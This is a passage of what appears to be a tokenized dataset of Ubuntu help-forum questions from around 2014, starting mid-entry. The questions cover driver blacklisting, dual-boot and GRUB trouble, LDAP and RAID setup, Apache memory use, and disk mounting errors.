amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140429.2fd1a05a-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-glamoregl [ amd64 ] < 0.6.0+git20140313.a4fbc773-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-radeon [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-15 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-15 [ amd64 ] < none > ( none ) broken xserver-xorg-video-glamoregl : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-radeon : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140429.2fd1a05a-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) update here is additional info : [ lucas @ lucas-thinkpad-w520 ] ~ $ less /etc/apt/sources.list.d/ bumblebee-stable-saucy.list bumblebee-stable-saucy.list.distupgrade bumblebee-stable-saucy.list.save cassou-emacs-saucy.list cassou-emacs-saucy.list.distupgrade cassou-emacs-saucy.list.save dropbox.list dropbox.list.distupgrade dropbox.list.save google-chrome.list google-chrome.list.distupgrade google-chrome.list.save google-talkplugin.list google-talkplugin.list.distupgrade google-talkplugin.list.save insync.list insync.list.distupgrade insync.list.save kilian-f_lux-saucy.list kilian-f_lux-saucy.list.distupgrade kilian-f_lux-saucy.list.save mongodb.list mongodb.list.distupgrade mongodb.list.save nemh-gambas3-saucy.list nemh-gambas3-saucy.list.distupgrade nemh-gambas3-saucy.list.save n-muench-calibre-saucy.list n-muench-calibre-saucy.list.distupgrade n-muench-calibre-saucy.list.save thefanclub-grive-tools-saucy.list thefanclub-grive-tools-saucy.list.distupgrade thefanclub-grive-tools-saucy.list.save webupd8team-java-saucy.list webupd8team-java-saucy.list.distupgrade webupd8team-java-saucy.list.save xorg-edgers-ppa-saucy.list xorg-edgers-ppa-saucy.list.distupgrade xorg-edgers-ppa-saucy.list.save and also my /etc/apt/sources.list below : # deb cdrom : [ ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) ] / saucy main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ saucy main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ saucy main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ saucy-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ saucy universe deb-src http : //us.archive.ubuntu.com/ubuntu/ saucy universe deb http : //us.archive.ubuntu.com/ubuntu/ saucy-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ saucy multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ saucy multiverse deb http : //us.archive.ubuntu.com/ubuntu/ saucy-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu saucy-security main restricted deb-src http : //security.ubuntu.com/ubuntu saucy-security main restricted deb http : //security.ubuntu.com/ubuntu saucy-security universe deb-src http : //security.ubuntu.com/ubuntu saucy-security universe deb http : //security.ubuntu.com/ubuntu saucy-security multiverse deb-src http : //security.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu saucy partner # deb-src http : //archive.canonical.com/ubuntu saucy partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu saucy main # deb-src http : //extras.ubuntu.com/ubuntu saucy main deb http : //repository.spotify.com stable non-free # deb-src http : //repository.spotify.com stable non-free
458611	blacklisting nouveau not working on ubuntu 14.04	i know there is plenty of documentation on blacklisting the nouveau driver . however the normal methods are not working for me . i tried adding the below lines in the /etc/modprobe.d/blacklist.conf file , however this does not work . nouveau still gets loaded anyway . blacklist nouveau blacklist lbm-nouveau options nouveau modeset=0 alias nouveau off alias lbm-nouveau off i tried to disable the kernel modules using this command : echo options nouveau modeset=0 | sudo tee -a /etc/modprobe.d/nouveau-kms.conf followed by : update-initramfs -u but it does n't work . nouveau still gets loaded anyway .
458612	starting up ubuntu 14.04 after installing	after installing ubuntu 14.04 and rebooting , i get the message `` serious errors were found while checking the disk drive for/. `` and ubuntu 14.04 will not startup .
458613	some way to block access to certain directories for tech support ?	i 'm about to ship my laptop to tech support and i started thinking , i do n't want them going through my downloads or family photos , etc , however they require the administrator password . the problem with the laptop is n't even software related though , purely hardware . is there a way to give tech support the admin password , so they can make sure it boots correctly and what not , but to protect some of my personal files ? what about passwords saved in chrome ? they could start chrome and see all of my passwords . would a regular user/guest account work in this way and still satisfy tech support ? i 've got business docs , ( s ) ftp passwords , and other information that just does n't need the chance to leak out , regardless of whether i trust the company 's support or not . thanks in advance .
458614	why does package mercurial depend on x11-common in a chroot'ed environment ?	in relation to a previous question i posed ( make apt-get ( or aptitude ) run with -y but not prompt for replacement of configuration files ? ) i came across a somewhat peculiar and hard to explain behavior . perhaps someone can explain it still . when i execute the following right after a debootstap inside the target chroot , package mercurial appears to require a lot more than seems logical : apt-get -s -y -o dpkg : :options : := -- force-confdef -o dpkg : :options : := -- force-confold install mercurial reading package lists ... building dependency tree ... the following extra packages will be installed : ca-certificates fontconfig-config fonts-dejavu-core libdrm-intel1 libdrm-nouveau2 libdrm-radeon1 libelf1 libfontconfig1 libfontenc1 libfreetype6 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libice6 libllvm3.4 libpciaccess0 libsm6 libtcl8.6 libtk8.6 libtxc-dxtn-s2tc0 libutempter0 libx11-6 libx11-data libx11-xcb1 libxau6 libxaw7 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-shape0 libxcb-sync1 libxcb1 libxcomposite1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxmu6 libxmuu1 libxpm4 libxrandr2 libxrender1 libxshmfence1 libxss1 libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 mercurial-common openssl tcl tcl8.6 tk tk8.6 x11-common x11-utils xbitmaps xterm suggested packages : libglide3 qct vim emacs kdiff3 kdiff3-qt kompare meld tkcvs mgdiff python-mysqldb python-pygments python-openssl tcl-tclreadline mesa-utils xfonts-cyrillic recommended packages : wish the following new packages will be installed : ca-certificates fontconfig-config fonts-dejavu-core libdrm-intel1 libdrm-nouveau2 libdrm-radeon1 libelf1 libfontconfig1 libfontenc1 libfreetype6 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libice6 libllvm3.4 libpciaccess0 libsm6 libtcl8.6 libtk8.6 libtxc-dxtn-s2tc0 libutempter0 libx11-6 libx11-data libx11-xcb1 libxau6 libxaw7 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-shape0 libxcb-sync1 libxcb1 libxcomposite1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxmu6 libxmuu1 libxpm4 libxrandr2 libxrender1 libxshmfence1 libxss1 libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 mercurial mercurial-common openssl tcl tcl8.6 tk tk8.6 x11-common x11-utils xbitmaps xterm 0 upgraded , 64 newly installed , 0 to remove and 3 not upgraded . looking at the output from apt-cache depends it 's beyond me why apt-get decides that these dependencies have to be installed . as you can see i am passing dpkg options as described in the above linked question . the main intention behind it is to prevent apt-get and ultimately dpkg from prompting during what is supposed to be an automated installation . however , i have tried running the same without passing those options and the result is the same .
458615	ca n't type in login password because no keyboard is found	i was trying to edit a keyboard layout in ubuntu 14.04 , but it was n't accepting the changes . i looked it up and found i needed to delete /var/lib/xkb to make the change take effect . i did that and it still had n't taken effect , but nothing had changed either . i looked further and found i had to do sudo restart lightdm . i did that and it did its thing , but when i tried to log back in , i could n't type . i shut down and tried again , but i still could n't type . i went to onscreen keyboard and it said no x keyboard found , retryingâś i do n't even have a usb keyboard or anything , it 's a laptop with the keyboard built in . i ca n't do anything because my keyboard does n't work and i have no idea what to do . help !
458616	soundfont with timidity	is there an easy intuitive ( user-friendly ) way to use a soundfont with timidity ? i have seen some complicated how-to but it 's not convenient at all for a end-user .
458623	how to create a txt log file of a `` make install '' ?	i trying to install a program and i would like to see a txt file with the details of the operation . i think it is called a log file , am i right ? once , someone told me to do this command : `make < install > file.txt 2 > 1 ` but it is not working . i need to see the details to know more about the problems and try to fix them . please , if someone know how to do it i will be glad to know . thank you .
458625	hard drive making light scratching noise	ever since i installed ubuntu , i 've noticed the hard drive making a few new sounds . most of them are soft scratching noises , but i 'm not sure if it has to do with a failing drive . i just got this computer last year . i ran the commands from fix for constant hard drive clicking noise in ubuntu and problem with hard drive clicking , even though my computer 's hard drive is not clicking , just scratching . it helped some , but i can still hear the sounds . i do n't really recall hearing them when i had windows installed prior to ubuntu 14.04 . i also ran the tests on this blog and got a number of 193 for the load_cycle_count and 9 for power_on_hours . the blog said that if you divide the load_cycle_count by the power_on_hours , you should get a number less than 15 , though i got 21.4 . so far , i have n't had any issues or warnings relating to the hard drive , and speed is as good as on windows ! i took a recording of the sound here ( it 's at the end ) , but keep in mind i took it with my phone and placed the mic right over where the hard drive is .
458627	how to install ubuntu 14.04 dual boot	i wanted to ask how to install ubuntu 14.04 dual boot . i have windows 8.1 pre-installed and i downloaded the ubuntu 14.04 and i want to dual boot them . please tell me how do i do that . please do help .
458629	why are there mac installation cds for ubuntu , but not xubuntu ?	the 64-bit installation cds for ubuntu 14.04 come in two versions : for macs and all other amd64s . the reason for this is apparently the failure of macs to boot multi-catalog cds . why is there only one version of xubuntu then ? will the xubuntu cd boot on a mac ?
458637	create a custom profile for a custom format in gnac	i want to be able to create .m4a files with alac encoding using gnac on ubuntu 14.04 - desktop x86-64 . since there is no built in profile for alac i have to use the custom profile + custom format option . i 've never used gnac before so i 've no clue what i need to type in . my understanding is that gnac supports any format gstreamer does , and that gstreamer supports alac ? i 'm also not sure if i need to install anything else to get alac support in gstreamer ? screenshot of custom profile ( using custom format ) :
458638	error : parsing file '/var/lib/dpkg/updates/0013 ' near line 0 : eof after field name	installing ubuntu.desktop failed and i get message e : dpkg was interrupted , you must manually run sudo dpkg -- configure -a to correct . when i run that command i get the following message : dpkg : error : parsing file '/var/lib/dpkg/updates/0013 ' near line 0 : eof after field name . i 'm trying to reinstall the ubuntu.desktop but not sure how to proceed . any ideas would be appreciated .
458641	`` error : file does n't exist '' when trying to transfer files to iphone	i am running ubuntu 14.04 and want to transfer some videos to my iphone 5 ( ios7 ) to it . when i connect the phone it is mounted correctly and i can see all the dcim , photo ... folders in nautilus . but where do i copy my .mp4 files ? i have searched the net but all is related to syncing music files ( mp3 ) . here , here , here . also , when i try to copy something in document folder or inside any app ( 2nd mounted iphone point ) it gives me an error : error : file does n't exist so , is there any folder in 1st mounted point ( like dcim , photo etc.. ) where i can simply copy my mp4 files and watch it in my iphone ? ( note : i do n't need sync function but will not harm if it can be achieved ) . edit : now i see two more problems : for some reason my document folder is not mounted any more ( even after unmounting and restarting ) . only the picture , dcim etc . folders are mounted . i sometimes get this : edit 2 : when i tried the troubleshoot method in 1st link of duplicate i get error : pairing with device xxxxx failed with unhandled error code -20 . ( and my phone was not locked ) also , i get on re-connecting :
458642	first installing ubuntu 14.04 lts	when i first installing ubuntu in my computer that said `` serious errors were found while checking the disk drive for /tmp is not ready yet or not present '' what happened with this and how i solved this problem ?
458644	files automatically deleted	hi all i am using ubuntu 12.04 lts . everything was right yesterday night . when i open my laptop today morning all my desktop files are deleted automatically . i searched in trash and peek into hidden files but no use . so much of important data is there in it . can anybody help me to get my data back . please ...
458647	sony 32 gb usb drive will not show on any computer	i have a sony usm32gm 32 gb usb flash drive and i can not get it to show up on any device . i have tried it in windows 7 pro , and it will show up and try to install the driver , fail , and then it wo n't show up again unless i delete the driver , then it repeats . i have tried it in mac osx 10.5.8 ppc , where , if i plug it into the usb port on the keyboard , it acknowledges it , saying that it ca n't get enough power . if i plug it directly into the computer , it wo n't show up at all , or anything . finally , i tried it in both my ubuntu 12.04 lts machine and my zorin 6.4 lts machine ( zorin 6 is based on ubuntu 12.04 ) , and it would not come up in any file manager , even under /media . i tried `` lsusb '' in terminal , and got : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0424:2504 standard microsystems corp. usb 2.0 hub bus 001 device 003 : id 148f:3070 ralink technology , corp. rt2870/rt3070 wireless adapter bus 005 device 002 : id 413c:2501 dell computer corp . bus 001 device 000 : id 054c:02a5 sony corp. microvault flash drive the last one must be it ! is there another way to access it ? i just want the data , even if i ca n't repair it ! also , wherever and whatever it is plugged into , the green light will flash on it , like it usually does . also , i have tried it in every port on each computer , with the same result . edit : the results of `` lsblk '' are : name maj : min rm size ro type mountpoint sr0 11:0 1 1024m 0 rom sda 8:0 0 74.5g 0 disk ├─sda1 8:1 0 52.6g 0 part /media/761ceb081ceac1eb ├─sda2 8:2 0 1k 0 part ├─sda5 8:5 0 18.9g 0 part / └─sda6 8:6 0 3g 0 part [ swap ] zram0 251:0 0 1.5g 0 disk [ swap ] sdb 8:16 1 29.1g 0 disk also , i forgot to mention that i have tried testdisk and photorec , both of which i am familiar with , but the drive will not show up in them . thank you !
458649	ubuntu 14.04 dash not recognizing numpad arrows	even though my numlock is disabled , the numpad arrow keys do n't work on the unity launcher to navigate through the menu . is is possible to configure them to work just like the regular arrow keys ?
458650	windows hard drive wo n't boot	i am a windows 7 64-bit user and decided to install ubuntu 14.04 on a separate hard drive . everything went perfectly until i wanted to boot windows again . i was not able to do it even though i entered the bios and it still recognizes the windows hard drive ( and i can see the windows files from ubuntu ) . i tried unplugging the ubuntu hard drive , and it says the machine needs a device to boot from . is there anything i can do to fix this and have both operating systems on separate hard drives ? thanks .
458653	psi4 `make tests` errors help	background : this is a rough follow-up to the previous question here . i am currently using ubuntu 14.04 and wish to install psi4 . it is a chemistry computation package , which requires many things , such as a linear algebra package . i 've chosen atlas after it was pointed out in the previous question 's answer . i 've installed all the pre-requisites . these include g++ , gfortran , libatlas-dev ( which installs libblas-dev and liblapack-dev ) , libboost-dev and python-dev . ( along with some version of latex ) . question : as per the answer of the abovementioned question , i 've used sudo apt-get install libatlas-dev sudo ../configure -- prefix=/usr/local/psi4 -- with-blas='-lf77blas -latlas ' -- with-lapack='-llapack -lcblas ' -- with-boost-libdir=/usr/lib/x86_64-linux-gnu it works just fine ( configure works without errors ) , but when i run the sudo make and then sudo make tests , i get tons of errors . here is a copy of test-case-results produced as output of make tests . i do n't really know how to handle this or understand what could have gone wrong . i would prefer a solution in which i do not have to reinstall atlas using the make and make install approach . p.s . i was also running the pc in performance mode during the configure , make and make tests as is recommended for the atlas package , but if i understand correctly , then it should only affect the timings and not the pass/fail performance of the tests .
458654	gdb and current block frame in the stack	i know that my current block is between epb and esp . is there a way to print my stack the following way : let 's says that len=ebp-esp i would like a command on gdb that would look like this : x/lenx $ esp so i 'm printing what 's on the stack for the current function being executed ? can i do this using display like : display/lenx $ esp ? thank you .
458655	screen flashing black just after booting	i 've just been noticing , after updating to ubuntu 14.04 that my screen flashes black at the log in screen . only for a quick second - but kinda weird seeing as it had n't happened before . it only ever happens the once . it then goes on as normal anyone else get this ? is it even a problem ? lol . i 've just never experienced it before . i was thinking it could just be the screen calibrating or something . i have a samsung r730 , 8gb ram , i3 processor , 128gb samsung 840 pro ssd . thanks in advance
458658	how to regenerate a specific thumbnail in nautilus ?	sometimes i crop pdfs in order to have a one-page reading instead of a scanned two pages . however , nautilus keeps an old thumbnail showing the former front page . i know that i can delete the hidden thumbnails folder , but i 'd like to know how can i regenerate only one specific thumbnail . f5 does n't help .
458662	how to reset unity panel in ubuntu 14.04	when i click my setting icon its shows only name in menu . please see the image i already tried unity-reset , compiz reset method and unity reset icons . please provide a solution for this madness .
458665	grub 2 fails to boot win 7	i have just installed kubuntu 13.10 on a windows 7 machine but now grub is unable to find the win 7 boot option.. : ( i have installed and ran boot-repair to generate the diagnostic link . http : //paste.ubuntu.com/7370400 the steps i took in creating the kubuntu installation can be found here . how do i partition my hard drive to install kubuntu ? please can you help me reconfigure grub2.0 to find the win 7 boot option . regards peter
458670	how can i activate extensions in banshee 2.9 ( really 2.6.2 ) ?	i have updated to ubuntu 14.04 i have updated banshee to 2.9+really2.6.2 . i can see there 's no more extensions available . how can i install all the extensions from the earlier versions ( 2.4 ) ? im looking for the lyrics , kareoke and album cover extensions .
458672	remove old ldap users from login screen ?	when using computers with ldap users , once a user logs on to a computer , they are shown on the login screen in the user list . how can we remove old users or reset the cached list ? we are not trying to disable the list and we are not trying to exclude a specific user .
458673	ubuntu 12.04 server : problem with apache internal processes using too much memory ?	i 've looked around and could n't find an answer for this , tried quite a few of other people 's solutions over the months , but nothing fixes this . i run 12.04 on a good vps , but i 've been having some load/memory issues with apache2.2 over the last month or two , but it 's always been a bit of a problem so i upgraded to 2gb vps with 2gb swap . but some parts of the day the server goes slow , monit sends me alerts that it 's > 97 % memory , and i look and it 's always loads of apache processes , although mysql is a big second . i assumed it was load , but using netstat e.g . netstat -nt | awk '/time_wait/ { split ( $ 5 , a , '' : '' ) ; print a [ 1 ] } ' | sort | uniq -c | sort -n | tail which apparently shows the connections over 5 minutes , a large part of them are my own ip - currently 32 , but it goes upto > 100 sometimes . also i 've done a complete reinstall recently , caused by a failed restore after it got suspended for a load issue . again , apache went up and up - but on a few occasions it 's gone < 20 loadavg o.o thankfully not doing that atm but it 's hovering around 1-2-3 for all which is more than usual . so is there a way to find out what local programs are hammering/spawning apache processes ? any ideas of what could be hammering this ? i tried stopping services and watching top and htop - with no mysql and apache mem usage is around 40mb , mysql is goes up to 180mb , and then apache 2gb ( ! ! ! ) . also tried stopping ones that might be causing issues , like dropbox , spam assassin , ( i 've stopped using clamav because that was hammering the load ) , etc . but does n't seem to make a difference in the netstat or memory ? and yes the web server is sluggish during this - not surprised , as there 's no overhead to serve pages ! static is fast though ( i run mostly blogs on wordpress , php 5.3.10-1ubuntu3.11 with suhosin-patch , zend engine installed - i did have xcache but took it off , it caused problems with w3totalcache - which i do n't use on much of my sites now , as i was suspecting it for the load issue. ) . i 've tweaked apache.conf til the cows come home too , currently it 's on : timeout 15 keepalive on < ifmodule mpm_prefork_module > startservers 1 minspareservers 1 maxspareservers 10 maxclients 50 serverlimit 50 maxrequestsperchild 4000 listenbacklog 100 < ifmodule mpm_worker_module > startservers 8 minsparethreads 5 maxsparethreads 4 threadlimit 64 threadsperchild 25 maxclients 50 maxrequestsperchild 0 < /ifmodule > < ifmodule mpm_event_module > startservers 2 minsparethreads 25 maxsparethreads 75 threadlimit 64 threadsperchild 25 maxclients 150 maxrequestsperchild 500 < /ifmodule > ( i 've experimented with low and high values for the prefork and worker mpm over the last year or so , it seems totally arbitrary - it was on startservers 2 minspareservers 5 before , the rest pretty much the same , and does n't fix it even after a restart . i guess i could go higher than these - and did before , maxclients was 500 i think - but the load scare meant i went down to smaller values . here 's the output of free -m : total used free shared buffers cached mem : 2048 2046 1 0 0 10 -/+ buffers/cache : 2036 11 swap : 2048 1546 501 vmstat 2 10 : procs -- -- -- -- -- -memory -- -- -- -- -- -- -swap -- -- -- -io -- -- -system -- -- -- cpu -- -- r b swpd free buff cache si so bi bo in cs us sy id wa 0 0 1594992 1872 0 13536 3363 3619 46 23 0 1718 7 2 90 0 0 0 1594992 1472 0 14536 248 248 2 6 0 357 4 0 96 0 0 0 1594980 1496 0 14504 1024 1018 0 708 0 713 0 0 99 1 0 0 1596116 2700 0 14208 164 732 0 0 0 206 2 0 98 0 0 0 1599956 1648 0 13588 194 2144 2 100 0 617 18 1 80 0 0 0 1602388 1500 0 15352 1128 2392 34 10 0 1487 20 2 78 0 0 0 1602384 1516 0 15328 190 188 0 274 0 209 0 0 100 0 1 0 1595856 2320 0 8052 18266 15038 114 2 0 9611 13 3 81 0 0 0 1593316 4208 0 3608 10534 9268 0 4 0 5558 4 1 94 0 0 0 1593296 3132 0 4684 10 0 0 66 0 94 0 0 100 0 i do have a screengrab of my top but ca n't post it here cos i do n't have enough reputation sigh . any ideas ? edit : i thought i might have too low a maxclients / serverlimit so increased that and it made a great difference - until mysql kept falling over about a minute later . : - ( currently have that on 150 ( i read somewhere that it 's your memory / average apache process = maxclients , so 2gb / 3.5 = 571 - but 500 got very unstable ...
458676	no video driver load on inspiron 14z	i 've installed ubuntu 14.04 on my dell inspiron 14z ( 5423 ) with radeon hd7570 via liveusb . after i 've installed the system , during boot , just appeared a popup asking about other ways to load the system , but i ca n't select any option , including to enter in text mode , because mouse and keyboad were n't recognize . any suggestion ?
458678	error 1962/failing to install ubuntu 14.04	i have a lenovo ideacentre k410 desktop pc . i have added a geforce gtx 260 graphics card to the machine . i have used many different programs to install the iso on the usb stick . the programs are : *rufus *unetbootin *pen drive linux the operating system ( ubuntu 14.04 ) normally hangs on the second part of the installation , but after restarting the installation it does seem to work , sometimes . i have been successful at installing the os 3 times however , all three times i get the error message : error 1962 : no operation system found . any idea what i can do ? i have installed and ran zorin os in the past with ease and no issues . ( same pc ) i also make sure to reset the boot sequence after the installation is complete and restarts .
458679	can not work dual boot ubuntu and windows	i could not boot windows 7 normally in my hard disk after installed the ubuntu 12.04lts , i only could boot the normal ubuntu 12.04lts ( linux ) , but could not boot recovery linux nor windows 7 , then i ran the iso cd boot repair trying to fix the boot loader , but it did n't work , the problem was unchanged : only boot ubuntu 12.04ltd ( linux normally ) not else . this is the log generated by boot repair : http : //paste.ubuntu.com/7370352/ when i boot from a cd grub2 it recognizes all the system boot-ables : ubuntu , ubuntu recovery , and windows vista recovery ( windows 7 ) could somebody help me to fix the problem ?
458683	my ubuntu install on radeon xpress 1250 hardware shows rainbows on the top bar	ubuntu 14.04 shows cutesy rainbow-patterned artifacts on unity 's top panel , my lack of reputation prevents me from directly posting screenshots , here 's a gallery of the effect at work : http : //imgur.com/tifbjyq , d87thjg , cqndv36 # 1 this is the output of lscpi : ~ $ lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs600 [ radeon xpress 1250 ] this is the output of glxinfo : ~ $ glxinfo | grep opengl opengl vendor string : x.org r300 project opengl renderer string : gallium 0.4 on ati rs600 opengl version string : 2.1 mesa 10.1.0 opengl shading language version string : 1.20 opengl extensions :
458684	upgrade to ubuntu 12.10 messed up grub	so i upgraded ubuntu 12.04 to 12.10 but after i restarted the computer it said error : file not found grub rescue > i used unetbootin to upload 12.04 to a usb but when i turned on the computer again it came up with the same message ( i did place usb at the top of the boot list ) . i tried a dvd next but still did n't work . i 'm not sure if it is the computer that 's screwed up or i have a bad usb , i would love to hear your answer .
458686	i ca n't open the update manager .	i got this message from update manager when i tried to open it . e : encountered a section with no package : header , e : problem with mergelist/var/lib/apt/lists/ppa.launchpad.net_relan_exfat_ubuntu_dists_quantal_main_i18n_translation-en % 5fsg e : the package lists or status file could not be parsed or opened .
458692	error mounting any partitions in the hard disc drive	i have two operative systems ( windows8.1 and ubuntu14.04 ) . in ubuntu when i try to open any partitions in the hard disc drive show me the following error : error mounting /dev/sda6 at /media/luisbenitezmath/push button reset : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda6 '' '' /media/luisbenitezmath/mi disco '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda6 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . why is this error happening ? how can i solve it ? thank in advance !
458693	how to join ldap client 12.04 to server 8.04	apt-get install libpam-ldap libnss-ldap nss-updatedb libnss-db nfscommon nscd ldap-utils you will again be asked a bunch of questions ldap server uniform resource identifier : ldap : //ldap.example.com distinguished name of the search base : dc=example , dc=com ldap : //ldap.example.com 3 make local root database admin : yes does the ldap database require login ? no ldap account for root : cn=admin , dc=example , dc=com ldap root password : i went to know which password to assign here i means new password are ldap server password now we need to edit the following files vi /etc/ldap.conf and add this line ; bind_policy soft were to add the above line in the next step .. vi /etc/ldap/ldap.conf base dc=example , dc=com uri ldap : //ldap.example.com sizelimit 0 timelimit 0 deref never in the next step .. vi /etc/nsswitch.conf passwd : files ldap group : files ldap shadow : files ldap hosts : files dns networks : files protocols : db files services : db files ethers : db files rpc : db files now update nss to use ldap . nss_updatedb ldap i getting an error ; failed to enumerate nameservice : no such file or directory and after this what to do ?
458696	how to configure and run mdadm raid with /boot and /boot/efi	i am finally getting around to setting up raid on my existing ubuntu 12.04 box . this is my first time with mdadm and i have read several tutorials and i believe i have the basics of the raid part understood ( running on sda3 and sdb3 for root partition ; no swap partition exists ) . i have not reboot to check things because i have run into a roadblock : i did not consider grub and the boot loader . i modified my fstab to reflect the uuid of the raid for the root partition . this is the only partition i have setup for raid . should i setup a raid for the /boot and /boot/efi partitions ? the fstab is configured to use uuids that are mount points for sda for the /boot and /boot/efi partitions ( running grub 1.99 ) . # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 uuid=455cf8f6-532c-442c-814c-b8c4d280d170 / ext4 errors=remount-ro 0 1 /dev/mapper/server2-swap_1 none swap sw 0 0 uuid=ae67b87a-53b0-4689-9971-1e8417cb5bfd /boot ext2 defaults 0 2 uuid=4b56-f26c /boot/efi vfat defaults 0 1 i am not certain how to handle this . would i create a different fstab for each drive , and then somehow exclude this from the raid ? that would be a pain to remember for maintenance . do i create another raid for the boot partition and the boot/efi ? if i did this , how would the fstab look ? my objective : i would like to be able to pull the cable from one hard drive and have the system start up although the raid is degraded , regardless of which drive is dead . how can i handle this with the fstab ? help , please . thanks ! !
458700	maas pxe_boot : how can i limit what images are downloaded from the command 'import-boot-images '	i 'm setting up a maas server where i want to download only one image for my nodes to boot via pxe_boot . when i initiate a command to import boot images i want to restrict to download only 14.04 , how can i do that ? is there a configuration file which i can edit ?
458707	iconv conversion not supported	i 'm not sure since when it happened , but it surely used to work before i upgraded to 14.04 ( from 13.10 ) and now it does n't : iconv -f utf-8 -t euc-jp input > output it gives me the following message : iconv : conversion to `euc-jp ' is not supported try `iconv -- help ' or `iconv -- usage ' for more information . i 've tried eucjp and i even tried a bunch of others listed in iconv -l , to no avail . something weird i 've noticed is that iconv -l results in : segmentation fault ( core dumped ) about 50 % of the time ... not sure what 's causing this . i tried looking elsewhere , but could n't find anything like this ( most probably i 've messed something up at some point ; p ) . also iconv does n't seem to be an apt package , so i 'm not really sure if/how i should reconfigure it ... thanks ! edit : not a very satisfying solution , but uconv works . not sure what the difference between the two is .
458708	ubantu 13.10 partition not booting	i have dual booted my laptop with windows 7 and ubuntu 13.10 . on start up , it shows me boot menu . if i select windows 7 it boots up normally and works fine . but when i select ubuntu option , it shows me ubuntu splash screen but does n't get booted up i.e . does n't show desktop . i have my important data on ubuntu partition . is there any way so that i can get into my ubuntu and take up all my data files ?
